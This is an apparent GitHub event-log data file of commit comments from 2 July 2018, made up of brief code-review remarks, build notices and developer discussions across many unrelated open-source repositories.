{"id":"7905912683","type":"CommitCommentEvent","actor":{"login":"SoDa-GitHub"},"repo":{"name":"NimaQu/ss-panel-v3-mod_Uim"},"payload":{"comment":{"id":29564487,"position":13,"line":55,"path":"app/Controllers/Admin/NodeController.php","commit_id":"182a81e822f7a723deaa761a7269133b365a10a9","created_at":"2018-07-02T10:49:46Z","updated_at":"2018-07-02T10:49:46Z","author_association":"COLLABORATOR","body":"我的锅"}},"created_at":"2018-07-02T10:49:46Z"}
{"id":"7905913175","type":"CommitCommentEvent","actor":{"login":"qlikossbuild"},"repo":{"name":"qlik-oss/core-website"},"payload":{"comment":{"id":29564490,"position":null,"line":null,"path":null,"commit_id":"0c566a2667362f5bb9ca852a2de09f312adb0695","created_at":"2018-07-02T10:49:52Z","updated_at":"2018-07-02T10:49:52Z","author_association":"CONTRIBUTOR","body":"A generated website with your changes can be accessed here: https://doc-review.qlikcore.com/failbrokenlink. The website will automatically be updated if more commits are pushed to the branch."}},"created_at":"2018-07-02T10:49:52Z"}
{"id":"7905919820","type":"CommitCommentEvent","actor":{"login":"Kongphanith"},"repo":{"name":"kobotoolbox/kobo-docker"},"payload":{"comment":{"id":29564497,"position":null,"line":null,"path":null,"commit_id":"437658d1e6f8979654874022e03ed2f6a35de73a","created_at":"2018-07-02T10:51:20Z","updated_at":"2018-07-02T10:51:20Z","author_association":"NONE","body":"\r\n![saved](https://user-images.githubusercontent.com/40759364/42160190-8001ba9a-7e20-11e8-9b6b-b550ae55be9d.png)\r\n"}},"created_at":"2018-07-02T10:51:20Z"}
{"id":"7905921724","type":"CommitCommentEvent","actor":{"login":"henrymbuguak"},"repo":{"name":"muvatech/Shopping-Cart-Using-Django-2.0-and-Python-3.6"},"payload":{"comment":{"id":29564499,"position":null,"line":null,"path":null,"commit_id":"c280b66df336285531d23f2eb4b0d0a881bed442","created_at":"2018-07-02T10:51:45Z","updated_at":"2018-07-02T10:51:45Z","author_association":"COLLABORATOR","body":"Hello Kavya1990, Now I understand your issues. The ability to add to reduce the number of products once the product is added to cart is a nice functionality, but my view of this would be to approached this problem in this manner:\r\n\r\n1. When a user add a product into the cart does not mean that the user has bought the product, so it means until the user has made the actual payment that's when you should reduce the number of available product.\r\n2. My suggestion would be to try and integrate the django shopping cart with a payment system like stripe. Once a client has made the actual payment, you can reduce the number of products available. I might actually do this but I am not sure when.\r\n\r\n3. Just to give you a hint on how to approach this, look at this file(https://github.com/muvatech/Shopping-Cart-Using-Django-2.0-and-Python-3.6/blob/master/cart/forms.py) on line 4 That's when I am putting the initial number of products. You can write a method in this file to reduce products once they are added into the cart.\r\n\r\nLet me know how you decide to approach this problem."}},"created_at":"2018-07-02T10:51:45Z"}
{"id":"7905923518","type":"CommitCommentEvent","actor":{"login":"EvgenKo423"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29564503,"position":null,"line":null,"path":null,"commit_id":"3c0b748069498bf88e2d9ce4c55ffb7621383297","created_at":"2018-07-02T10:52:11Z","updated_at":"2018-07-02T10:52:11Z","author_association":"NONE","body":"We're getting less and less XP with every boss battle now. The last one just ended and it was about 200 000 XP max while the previous one was about 450 000 XP max!\r\nPlease revert it back to 1 damage point!!"}},"created_at":"2018-07-02T10:52:11Z"}
{"id":"7905924144","type":"CommitCommentEvent","actor":{"login":"thiscoders"},"repo":{"name":"carllhw/odoo-hrp-dev-docker"},"payload":{"comment":{"id":29564504,"position":null,"line":null,"path":null,"commit_id":"546ba6b461f804a02eda05561d41ce4e6e58bc3b","created_at":"2018-07-02T10:52:19Z","updated_at":"2018-07-02T10:52:19Z","author_association":"NONE","body":"ok，明白了"}},"created_at":"2018-07-02T10:52:19Z"}
{"id":"7905925856","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29564507,"position":null,"line":null,"path":null,"commit_id":"3c0b748069498bf88e2d9ce4c55ffb7621383297","created_at":"2018-07-02T10:52:42Z","updated_at":"2018-07-02T10:52:42Z","author_association":"MEMBER","body":"Stop complaining, until we have more data about damage and relation to future bosses, it won't change."}},"created_at":"2018-07-02T10:52:42Z"}
{"id":"7905926555","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29564508,"position":43,"line":88,"path":"week-07/day-01/frontend/routes.js","commit_id":"1720ab3bf089e717f3632ff07b7be802bc493482","created_at":"2018-07-02T10:52:52Z","updated_at":"2018-07-02T10:52:52Z","author_association":"NONE","body":"missing semicolons after the res.json"}},"created_at":"2018-07-02T10:52:52Z"}
{"id":"7905927726","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29564511,"position":null,"line":null,"path":null,"commit_id":"7ba98c29fe0e1223500e07f10caf9520ffede543","created_at":"2018-07-02T10:53:10Z","updated_at":"2018-07-02T10:53:10Z","author_association":"NONE","body":"nicceee"}},"created_at":"2018-07-02T10:53:10Z"}
{"id":"7905930985","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29564519,"position":1,"line":1,"path":"ks-amp.code-workspace","commit_id":"9448b448ed88dbafd47ebd9837441c39d28f2d0c","created_at":"2018-07-02T10:53:52Z","updated_at":"2018-07-02T10:53:52Z","author_association":"NONE","body":"vao i don't know what's that file, but i think we don't need it"}},"created_at":"2018-07-02T10:53:52Z"}
{"id":"7905932022","type":"CommitCommentEvent","actor":{"login":"EvgenKo423"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29564523,"position":null,"line":null,"path":null,"commit_id":"3c0b748069498bf88e2d9ce4c55ffb7621383297","created_at":"2018-07-02T10:54:08Z","updated_at":"2018-07-02T10:54:08Z","author_association":"NONE","body":"Until you collect data the summer sale will end and lots of people won't get a badge. It's 3 days left..."}},"created_at":"2018-07-02T10:54:08Z"}
{"id":"7905933455","type":"CommitCommentEvent","actor":{"login":"dark-flames"},"repo":{"name":"luogu-dev/markdown-palettes"},"payload":{"comment":{"id":29564529,"position":null,"line":null,"path":null,"commit_id":"ed8edc8589562be291ca888a32d2e6f0145a4ef1","created_at":"2018-07-02T10:54:27Z","updated_at":"2018-07-02T10:54:27Z","author_association":"MEMBER","body":"But we usually use `let` instead of `var` in ES6"}},"created_at":"2018-07-02T10:54:27Z"}
{"id":"7905933479","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29564530,"position":null,"line":null,"path":null,"commit_id":"3c0b748069498bf88e2d9ce4c55ffb7621383297","created_at":"2018-07-02T10:54:28Z","updated_at":"2018-07-02T10:54:28Z","author_association":"MEMBER","body":"Don't use my script if you don't like it."}},"created_at":"2018-07-02T10:54:28Z"}
{"id":"7905933721","type":"CommitCommentEvent","actor":{"login":"MohammedKaludi"},"repo":{"name":"ahmedkaludi/accelerated-mobile-pages"},"payload":{"comment":{"id":29564531,"position":null,"line":null,"path":null,"commit_id":"1533e1b7f3dbcefb39fe0beab3498aeb2cdc3fa2","created_at":"2018-07-02T10:54:31Z","updated_at":"2018-07-02T10:54:31Z","author_association":"COLLABORATOR","body":"@Sejiro-Hiko Please use esc_url($custom_iframe_url) to escape the url."}},"created_at":"2018-07-02T10:54:31Z"}
{"id":"7905937311","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29564556,"position":24,"line":62,"path":"week-07/day-02/index.html","commit_id":"43871853113ffc7aaa8e46546774c924ae0be5ca","created_at":"2018-07-02T10:55:22Z","updated_at":"2018-07-02T10:55:22Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T10:55:22Z"}
{"id":"7905937841","type":"CommitCommentEvent","actor":{"login":"aravind-wdc"},"repo":{"name":"aravind-wdc/liblightnvm"},"payload":{"comment":{"id":29564560,"position":null,"line":null,"path":null,"commit_id":"8645ab1ce4ad749cc8bb43f7a8d444c833d9737b","created_at":"2018-07-02T10:55:29Z","updated_at":"2018-07-02T10:55:29Z","author_association":"OWNER","body":"Modified ouput.\r\n\r\n$ sudo build/cli/nvm_cmd rprt_lun /dev/nvme0n1 0 0 | less\r\n# nvm_cmd_rprt: 0x561f3210c4d0\r\nnaddrs: 1\r\naddrs:\r\n  - {val: 0x0000000000000000, pugrp: 00, punit: 00, chunk: 0000, sectr: 0000}\r\nrprt:\r\n  ndescr: 126\r\nrprt_descr:\r\n  - { slba: 0x0000000000000000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x0000000000001000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x03 }\r\n  - { slba: 0x0000000000002000, cnlb: 0x1000, wp: 0x000000000000000c, cs: 0x04, ct: 0x01, wli: 0x05 }\r\n  - { slba: 0x0000000000003000, cnlb: 0x1000, wp: 0x0000000000000000, cs: 0x01, ct: 0x01, wli: 0x04 }\r\n  - { slba: 0x0000000000004000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x0000000000005000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x0000000000006000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x0000000000007000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x0000000000008000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x0000000000009000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x000000000000A000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x000000000000B000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x000000000000C000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x000000000000D000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x000000000000E000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x000000000000F000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x0000000000010000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x0000000000011000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n  - { slba: 0x0000000000012000, cnlb: 0x1000, wp: 0x0000000000001000, cs: 0x02, ct: 0x01, wli: 0x01 }\r\n"}},"created_at":"2018-07-02T10:55:29Z"}
{"id":"7905939343","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29564564,"position":null,"line":null,"path":null,"commit_id":"43871853113ffc7aaa8e46546774c924ae0be5ca","created_at":"2018-07-02T10:55:49Z","updated_at":"2018-07-02T10:55:49Z","author_association":"NONE","body":"please write your scripts in separate files"}},"created_at":"2018-07-02T10:55:49Z"}
{"id":"7905939664","type":"CommitCommentEvent","actor":{"login":"EvgenKo423"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29564567,"position":null,"line":null,"path":null,"commit_id":"3c0b748069498bf88e2d9ce4c55ffb7621383297","created_at":"2018-07-02T10:55:53Z","updated_at":"2018-07-02T10:55:53Z","author_association":"NONE","body":"It's not that I don't like your script. It affects all the players because it's used the most and it suck the bosses up."}},"created_at":"2018-07-02T10:55:53Z"}
{"id":"7905940481","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29564568,"position":23,"line":23,"path":"week-07/day-02/giphy/giphy.js","commit_id":"771a8f8d02c16a636b3beef38e0dc422599b5a00","created_at":"2018-07-02T10:56:06Z","updated_at":"2018-07-02T10:56:06Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T10:56:06Z"}
{"id":"7905943627","type":"CommitCommentEvent","actor":{"login":"gemmellr"},"repo":{"name":"vert-x3/vertx-proton"},"payload":{"comment":{"id":29564580,"position":8,"line":331,"path":"src/main/java/io/vertx/proton/ProtonLink.java","commit_id":"35eeb59f82bf8f95d7e7a6b1b0d8a296ede09f2a","created_at":"2018-07-02T10:56:48Z","updated_at":"2018-07-02T10:56:48Z","author_association":"CONTRIBUTOR","body":"Javadoc updated."}},"created_at":"2018-07-02T10:56:48Z"}
{"id":"7905944544","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29564585,"position":10,"line":10,"path":"reddit/assets/script.js","commit_id":"992644222a67239d9f39bdbb050f164717a4418b","created_at":"2018-07-02T10:57:01Z","updated_at":"2018-07-02T10:57:01Z","author_association":"NONE","body":"niceee"}},"created_at":"2018-07-02T10:57:01Z"}
{"id":"7905946594","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29564592,"position":null,"line":null,"path":null,"commit_id":"526cbb22be0db1632166b802181a3bc58237c701","created_at":"2018-07-02T10:57:27Z","updated_at":"2018-07-02T10:57:27Z","author_association":"COLLABORATOR","body":"Thanks! That looks good to me! Well done."}},"created_at":"2018-07-02T10:57:27Z"}
{"id":"7905948560","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29564600,"position":null,"line":null,"path":null,"commit_id":"972a98a056cdc84e91c0e2d79dd5f5151a7855ff","created_at":"2018-07-02T10:57:53Z","updated_at":"2018-07-02T10:57:53Z","author_association":"NONE","body":"niceee"}},"created_at":"2018-07-02T10:57:53Z"}
{"id":"7905950625","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/ks-ampersand"},"payload":{"comment":{"id":29564607,"position":null,"line":null,"path":null,"commit_id":"e0f9bc38158664cfdbf386b7b1b7d8bb6e9508fc","created_at":"2018-07-02T10:58:20Z","updated_at":"2018-07-02T10:58:20Z","author_association":"NONE","body":"i like your git workflow, keep it up! :) "}},"created_at":"2018-07-02T10:58:20Z"}
{"id":"7905952493","type":"CommitCommentEvent","actor":{"login":"LegendaryZealot"},"repo":{"name":"LegendaryZealot/small_httpd"},"payload":{"comment":{"id":29564612,"position":null,"line":null,"path":null,"commit_id":"00cf5bdd87053a82452cdfa092b31c131fa0607f","created_at":"2018-07-02T10:58:45Z","updated_at":"2018-07-02T10:58:45Z","author_association":"OWNER","body":"adjust dir"}},"created_at":"2018-07-02T10:58:45Z"}
{"id":"7905968945","type":"CommitCommentEvent","actor":{"login":"vargas06"},"repo":{"name":"schacon/gitbook"},"payload":{"comment":{"id":29564654,"position":1,"line":24,"path":"text/23A_Setting_Up_Private_Repo/0_Setting_Up_Private_Repo.markdown","commit_id":"9b58d890df7509942c217df0f9169b3348b399b4","created_at":"2018-07-02T11:02:17Z","updated_at":"2018-07-02T11:02:17Z","author_association":"NONE","body":"Vargas.a27051989@gmail.com"}},"created_at":"2018-07-02T11:02:17Z"}
{"id":"7905969765","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29564657,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-02T11:02:29Z","updated_at":"2018-07-02T11:02:29Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T11:02:29Z"}
{"id":"7905970885","type":"CommitCommentEvent","actor":{"login":"timmyrs"},"repo":{"name":"hellshltd/Universal-Bypass"},"payload":{"comment":{"id":29564663,"position":null,"line":null,"path":null,"commit_id":"3d5e767a46054c0ece1e540aace4ec1bf3121a7a","created_at":"2018-07-02T11:02:42Z","updated_at":"2018-07-02T11:02:42Z","author_association":"MEMBER","body":"I just added 4,0 KB to the size of the content script.\r\nI'm really not proud about this but I feel like this is necessary."}},"created_at":"2018-07-02T11:02:42Z"}
{"id":"7905976916","type":"CommitCommentEvent","actor":{"login":"Majid1999"},"repo":{"name":"Majid1999/F-nj-yfC-v4-pwVYZ--HWksy-9f-XS--j-B--wGGSe4-SGMgr-P-H-ABke-q-UaXdjugb-CAY3-8ZJM-Qj"},"payload":{"comment":{"id":29564673,"position":null,"line":null,"path":null,"commit_id":"223a447f3a05badf74e46395c68893bec658ec5d","created_at":"2018-07-02T11:04:05Z","updated_at":"2018-07-02T11:04:05Z","author_association":"OWNER","body":"klfsdfpkwejg"}},"created_at":"2018-07-02T11:04:05Z"}
{"id":"7905978035","type":"CommitCommentEvent","actor":{"login":"ChadKillingsworth"},"repo":{"name":"google/closure-compiler-npm"},"payload":{"comment":{"id":29564681,"position":null,"line":null,"path":null,"commit_id":"7baf37c7988be4ecea924e85b43400919598464a","created_at":"2018-07-02T11:04:20Z","updated_at":"2018-07-02T11:04:20Z","author_association":"COLLABORATOR","body":"Sorry - I just missed that one. Tags pushed."}},"created_at":"2018-07-02T11:04:20Z"}
{"id":"7905979098","type":"CommitCommentEvent","actor":{"login":"lin714093880"},"repo":{"name":"luogu-dev/markdown-palettes"},"payload":{"comment":{"id":29564685,"position":null,"line":null,"path":null,"commit_id":"ed8edc8589562be291ca888a32d2e6f0145a4ef1","created_at":"2018-07-02T11:04:35Z","updated_at":"2018-07-02T11:04:35Z","author_association":"MEMBER","body":"A variable declared using `var` can end up having an unexpected effective scope. It actually makes no difference in this case but people generally discourage the use of `var` and switch to `let` or `const` instead."}},"created_at":"2018-07-02T11:04:35Z"}
{"id":"7905982335","type":"CommitCommentEvent","actor":{"login":"FHellmann"},"repo":{"name":"FHellmann/Uniatron"},"payload":{"comment":{"id":29564692,"position":13,"line":137,"path":"app/src/main/java/com/edu/uni/augsburg/uniatron/service/AppTrackingService.java","commit_id":"66f9c250f24b2bd96aa65e8e7422926a01a80ace","created_at":"2018-07-02T11:05:20Z","updated_at":"2018-07-02T11:05:20Z","author_association":"OWNER","body":"Why a return statement here? "}},"created_at":"2018-07-02T11:05:20Z"}
{"id":"7905984752","type":"CommitCommentEvent","actor":{"login":"153957"},"repo":{"name":"HiSPARC/publicdb"},"payload":{"comment":{"id":29564702,"position":null,"line":null,"path":null,"commit_id":"09efa4fa8a2af2202ee6a137ded04513b8896876","created_at":"2018-07-02T11:05:52Z","updated_at":"2018-07-02T11:05:52Z","author_association":"MEMBER","body":"I usually do, but this was a fairly minor change and didn't have time to split it.\r\nAnyone looking for the actual changes: just look for 'children' to find the places where the significant changes occurred."}},"created_at":"2018-07-02T11:05:52Z"}
{"id":"7905994007","type":"CommitCommentEvent","actor":{"login":"bulldetektor"},"repo":{"name":"aurelia/templating-router"},"payload":{"comment":{"id":29564719,"position":null,"line":null,"path":null,"commit_id":"38f9dc4dc7c4af60b21bf7d1e5b40f7f4e10433d","created_at":"2018-07-02T11:08:04Z","updated_at":"2018-07-02T11:08:04Z","author_association":"NONE","body":"@EisenbergEffect Could you publish a release with these changes? Seems 1.3.1 is the latest release right now."}},"created_at":"2018-07-02T11:08:04Z"}
{"id":"7905994707","type":"CommitCommentEvent","actor":{"login":"Endeavourl"},"repo":{"name":"antlr/grammars-v4"},"payload":{"comment":{"id":29564722,"position":null,"line":null,"path":null,"commit_id":"44aa3b6bebeec9b29397eb7cf5866597ddc19e7e","created_at":"2018-07-02T11:08:14Z","updated_at":"2018-07-02T11:08:14Z","author_association":"NONE","body":"Sorry to dig this up, but why does this rely on the InputStream class that isn't the part of ANTLR runtime? How am i supposed to use it in my application, where the only thing i have available is ANTLR runtime and adding other libs is non-trivial?"}},"created_at":"2018-07-02T11:08:14Z"}
{"id":"7905994826","type":"CommitCommentEvent","actor":{"login":"alon-e"},"repo":{"name":"jakubcech/docs"},"payload":{"comment":{"id":29564723,"position":5,"line":23,"path":"pages/iri/usage/troubleshooting-iri.js","commit_id":"432b827e7ac5602320dacacebfdfad496e977db6","created_at":"2018-07-02T11:08:16Z","updated_at":"2018-07-02T11:08:16Z","author_association":"NONE","body":"\"make sure there is traffic flowing and give the node some time to sync.\"\r\nI'd add an explanation on how to check that, for example:\r\nreview the `getNeighbors` results, you should see both incoming (`numberOfAllTransactions`) and outgoing (`numberOfSentTransactions`) transactions.\r\n```\r\n curl http://localhost:14265   -X POST   -H 'Content-Type: application/json'   -H 'X-IOTA-API-Version: 1'   -d '{\"command\": \"getNeighbors\"}'\r\n```\r\n```\r\n{\r\n  \"neighbors\": [\r\n     ...,\r\n    {\r\n      \"address\": \"www.example.com:15600\",\r\n      \"numberOfAllTransactions\": 2888,\r\n      \"numberOfRandomTransactionRequests\": 887,\r\n      \"numberOfNewTransactions\": 2310,\r\n      \"numberOfInvalidTransactions\": 0,\r\n      \"numberOfSentTransactions\": 2493,\r\n      \"connectionType\": \"tcp\"\r\n    }\r\n  ],\r\n  \"duration\": 1\r\n}\r\n```"}},"created_at":"2018-07-02T11:08:16Z"}
{"id":"7905995452","type":"CommitCommentEvent","actor":{"login":"OrdinaryMagician"},"repo":{"name":"OrdinaryMagician/blender-ue1export"},"payload":{"comment":{"id":29564725,"position":10,"line":42,"path":"FORMAT.md","commit_id":"9f0a0f88aa283836403eb8867a04ba902af7ec1d","created_at":"2018-07-02T11:08:25Z","updated_at":"2018-07-02T11:08:25Z","author_association":"OWNER","body":"Ah, and of course lil' boy Smirf would go and re-purpose the flag for something completely unrelated instead of re-implementing the original feature."}},"created_at":"2018-07-02T11:08:25Z"}
{"id":"7905999013","type":"CommitCommentEvent","actor":{"login":"talisela"},"repo":{"name":"cloudify-cosmo/docs.getcloudify.org"},"payload":{"comment":{"id":29564739,"position":null,"line":null,"path":null,"commit_id":"f1e240f3e9ef8754ac9123db4b14e91487392337","created_at":"2018-07-02T11:09:19Z","updated_at":"2018-07-02T11:09:19Z","author_association":"COLLABORATOR","body":"@ben what do you think about what Inbal and I came up with: \r\nOnly the creator of the secret, a sys-admin or a tenant manager of the secret's tenant can see, update or delete the hidden value secret (unlike a non-hidden secret which other users in the tenant can also update or delete). "}},"created_at":"2018-07-02T11:09:19Z"}
{"id":"7906002479","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29564750,"position":233,"line":296,"path":"actionlibrary/src/main/java/com/axway/ats/action/filesystem/snapshot/RemoteFileSystemSnapshot.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T11:10:09Z","updated_at":"2018-07-02T11:10:09Z","author_association":"OWNER","body":"Resolved"}},"created_at":"2018-07-02T11:10:09Z"}
{"id":"7906003582","type":"CommitCommentEvent","actor":{"login":"MohammedKaludi"},"repo":{"name":"ahmedkaludi/accelerated-mobile-pages"},"payload":{"comment":{"id":29564753,"position":28,"line":4314,"path":"templates/features.php","commit_id":"7d21dd631cd9fc5a5480db74c36078d9faff867a","created_at":"2018-07-02T11:10:23Z","updated_at":"2018-07-02T11:10:23Z","author_association":"COLLABORATOR","body":"Please use esc_url function to escape url."}},"created_at":"2018-07-02T11:10:23Z"}
{"id":"7906012534","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29564771,"position":null,"line":null,"path":null,"commit_id":"71628778944251eb36d6d92c2de9bfe64d3abf21","created_at":"2018-07-02T11:12:31Z","updated_at":"2018-07-02T11:12:31Z","author_association":"OWNER","body":"selbachgra"}},"created_at":"2018-07-02T11:12:31Z"}
{"id":"7906016014","type":"CommitCommentEvent","actor":{"login":"pgleeson"},"repo":{"name":"LEMS/jLEMS"},"payload":{"comment":{"id":29564780,"position":18,"line":18,"path":"src/test/java/org/lemsml/jlems/test/URLInclusionReaderTest.java","commit_id":"b63da4d3b7aa1efd48c163ed374104b93925286d","created_at":"2018-07-02T11:13:20Z","updated_at":"2018-07-02T11:13:20Z","author_association":"MEMBER","body":"@tarelli Have you been clearing out your Dropbox recently...? This URL has vanished. \r\n\r\nDo you have the target file backed up somewhere (it had been altered to use only url includes)? Or even better restore it so master branch etc. still works?"}},"created_at":"2018-07-02T11:13:20Z"}
{"id":"7906020387","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564789,"position":40,"line":81,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"0f65b17c49a815b52e827ebccadfc7b47ca5428c","created_at":"2018-07-02T11:14:22Z","updated_at":"2018-07-02T11:14:22Z","author_association":"NONE","body":"use your `store/load``Shared` functions to lay this out more nicely in shared memory banks\r\n\r\non top you can use an address mangling scheme with padding to avoid shared memory conflicts\r\nhttps://developer.nvidia.com/gpugems/GPUGems3/gpugems3_ch39.html (section 39.2.3)\r\nhttps://www.cise.ufl.edu/~akn/CMP_Report.pdf (page 4, basically a repeat of the above)"}},"created_at":"2018-07-02T11:14:22Z"}
{"id":"7906021510","type":"CommitCommentEvent","actor":{"login":"rathankalluri"},"repo":{"name":"rathankalluri/aws-django"},"payload":{"comment":{"id":29564793,"position":null,"line":null,"path":null,"commit_id":"0366ee869c58769963fb19a616e3f19e4312dc12","created_at":"2018-07-02T11:14:37Z","updated_at":"2018-07-02T11:14:37Z","author_association":"OWNER","body":"revert"}},"created_at":"2018-07-02T11:14:37Z"}
{"id":"7906024679","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564807,"position":40,"line":81,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"0f65b17c49a815b52e827ebccadfc7b47ca5428c","created_at":"2018-07-02T11:15:24Z","updated_at":"2018-07-02T11:15:24Z","author_association":"NONE","body":"Also this, for actual code\r\nhttps://www.mimuw.edu.pl/~ps209291/kgkp/slides/scan.pdf"}},"created_at":"2018-07-02T11:15:24Z"}
{"id":"7906030970","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29564817,"position":94,"line":135,"path":"ext/Blur/CBlurPerformer.cpp","commit_id":"0f65b17c49a815b52e827ebccadfc7b47ca5428c","created_at":"2018-07-02T11:16:53Z","updated_at":"2018-07-02T11:16:53Z","author_association":"NONE","body":"I suppose this turns exclusive into inclusive scan?\r\n\r\nif yes then comment this section"}},"created_at":"2018-07-02T11:16:53Z"}
{"id":"7906031567","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtTamari/UML_report"},"payload":{"comment":{"id":29564820,"position":null,"line":null,"path":null,"commit_id":"15323febe20a0ea558e8a706e41dab3d375d1139","created_at":"2018-07-02T11:17:01Z","updated_at":"2018-07-02T11:17:01Z","author_association":"COLLABORATOR","body":"柴田\r\nちょっと意地悪な質問になりますが、11-1のシーケンス図でアクターがカードを挿入した直後にパスワードが入力できてしまうのでしょうか？考えてみてください。\r\nその観点で行くと、ほかの部分でも同様の考え方が行われる部分があるかと思います。\r\n（そもそもこれで合っていると言えば合っているのですが）"}},"created_at":"2018-07-02T11:17:01Z"}
{"id":"7906033479","type":"CommitCommentEvent","actor":{"login":"torognes"},"repo":{"name":"frederic-mahe/vsearch-tests"},"payload":{"comment":{"id":29564834,"position":null,"line":null,"path":null,"commit_id":"04545f6ff20475694c9fd0e6e734e16d823111a9","created_at":"2018-07-02T11:17:27Z","updated_at":"2018-07-02T11:17:27Z","author_association":"COLLABORATOR","body":"Yes, this is the expected behavior. It should use the first sequence and preserve the case."}},"created_at":"2018-07-02T11:17:27Z"}
{"id":"7906034506","type":"CommitCommentEvent","actor":{"login":"ianfab"},"repo":{"name":"ianfab/Fairy-Stockfish"},"payload":{"comment":{"id":29564837,"position":null,"line":null,"path":null,"commit_id":"329b62ebd75de8a3fe6789f0c54cd28361a94d97","created_at":"2018-07-02T11:17:43Z","updated_at":"2018-07-02T11:17:43Z","author_association":"OWNER","body":"@ddugovic Sorry, I think your worker was kicked out due to falling below the minimum nps threshold (since this fork is much slower because of the overhead for fairy pieces). If you want to avoid this, you can lower the threshold in your worker."}},"created_at":"2018-07-02T11:17:43Z"}
